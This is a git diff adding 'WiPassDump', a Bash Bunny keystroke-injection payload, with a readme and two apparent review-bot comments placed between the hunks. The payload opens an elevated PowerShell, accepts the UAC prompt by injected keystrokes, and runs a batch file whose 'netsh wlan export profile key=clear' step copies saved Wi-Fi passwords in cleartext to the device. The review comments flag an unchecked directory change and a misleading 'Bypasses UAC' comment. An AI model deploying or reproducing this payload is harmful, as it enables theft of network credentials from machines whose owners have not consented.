diff --git a/payloads/library/WiPassDump/a.cmd b/payloads/library/WiPassDump/a.cmd
new file mode 100644
index 0000000..858b01e
--- /dev/null
+++ b/payloads/library/WiPassDump/a.cmd
@@ -0,0 +1,6 @@
+REM Go to dump directory
+cd /d %~dp0
+cd ../../loot/WiPassDump/
+
+REM Dump saved Wi-Fi infos
+netsh wlan export profile key=clear
\ No newline at end of file
diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt
new file mode 100644
index 0000000..c141d94
--- /dev/null
+++ b/payloads/library/WiPassDump/payload.txt
@@ -0,0 +1,56 @@
+#!/bin/bash
+#
+# Title: WiPassDump
+# Author: samdeg555
+# Version: 1.0
+# Target: Windows
+#
+# Runs powershell as Administrator
+# Bypasses UAC
+# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny
+#
+
+LED R 200
+
+# Create directory to dump infos
+mkdir -p /root/udisk/loot/WiPassDump
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+# Set language accordingly
+Q SET_LANGUAGE ca
+
+ATTACKMODE HID STORAGE
+
+LED B 200
+
+# Launch powershell as admin
+Q GUI r
+Q DELAY 100
+Q STRING powershell Start-Process powershell -Verb runAs
+Q ENTER
+
+# Bypass UAC
+Q DELAY 3000
+Q ALT o
+Q ENTER
+Q DELAY 500
+
+# Start a.cmd
+Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/'
+Q STRING $SWITCH_POSITION
+Q STRING '/a.cmd'"'"')'
+Q ENTER
+
+# Wait for a.cmd to finish and exit
+
+LED R B 500
+
+Q DELAY 3000
+Q STRING exit
+Q ENTER
+
+sync
+
+LED G
diff --git a/payloads/library/WiPassDump/readme.md b/payloads/library/WiPassDump/readme.md
new file mode 100644
index 0000000..72412ab
--- /dev/null
+++ b/payloads/library/WiPassDump/readme.md
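Review bot: In a.cmd, `cd ../../loot/WiPassDump/` is not checked before `netsh wlan export profile key=clear` runs, so if the loot folder is missing the exported profile files, which hold keys in clear text, are written to whichever directory is current instead. Because those files are credentials, the script should stop rather than leave them somewhere they will not be accounted for or purged after the assessment: `cd ../../loot/WiPassDump/ || exit /b 1`. A `REM` line stating that the output contains cleartext keys and must be handled and deleted as sensitive data would also help.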
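Review bot: In payload.txt, the header comment `# Bypasses UAC` and the section comment `# Bypass UAC` above `Q ALT o` describe something the code does not do. Those lines send Alt+O and Enter after a fixed `Q DELAY 3000` to whatever dialog has focus, which means they accept the elevation consent prompt by keystroke rather than bypass it. The distinction matters to anyone reading this to judge exposure: it presumably only applies when the logged-on user is already a local administrator, and a session that must enter credentials at the prompt would not be elevated this way. Suggested wording for both comments: `# Accept the UAC consent prompt via injected keystrokes (not a bypass)`.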
@@ -0,0 +1,26 @@
+# WiPassDump for Bash Bunnys
+
+* Author: samdeg555
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Dumps saved Wi-Fi infos including clear text passwords to the bash bunny
+Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder.
+
+## Configuration
+
+None needed.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Red (blinking) | Setting up |
+| Blue (blinking) | Attack running |
+| Purple (blinking) | Almost done (cleaning up) |
+| Green | Attack Complete |
+
+## Discussion
+None yet.